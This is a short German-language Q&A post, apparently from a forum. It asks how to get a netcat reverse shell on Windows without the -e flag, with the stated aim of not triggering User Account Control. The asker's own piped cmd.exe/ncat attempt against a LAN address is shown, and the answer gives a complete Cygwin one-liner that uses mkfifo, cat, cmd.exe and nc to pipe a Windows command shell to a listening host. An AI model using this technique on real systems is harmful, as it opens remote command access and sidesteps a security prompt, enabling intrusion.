Gibt es eine Möglichkeit, unter Verwendung von netcat eine Reverse-Shell zu erhalten, ohne die Option -e zu verwenden, da dies die Benutzerkontensteuerung auslöst?
Ich habe es von Linux auf Linux mit einer Named Pipe zum Laufen gebracht. Ich wollte etwas Ähnliches in Windows erreichen.
Beim Ausführen c:\windows\system32\cmd.exe | ncat -l -p 666unter Windows bekomme ich in Linux eine Aufforderung, wenn ich mich verbinde:
# nc 192.168.0.109 666 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\user> dir ^C Es sieht so aus, als ob ich nahe bin, vielleicht fehlt etwas einfaches? Wenn es in Windows nur Named Pipes gäbe ...
Ich bin mir nicht sicher, ob Sie es mit Pure Win32 Netcat tun können, aber Sie können es in Cygwin. Hören Sie sich 1234 an nc -l 1234und verbinden Sie sich dann mit diesem Befehl in einem separaten Fenster:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f
Beachten Sie, dass die Aufwärts- und Abwärts-Tasten nicht dazu geeignet sind, den Befehlsverlauf mit dieser Methode zu durchlaufen.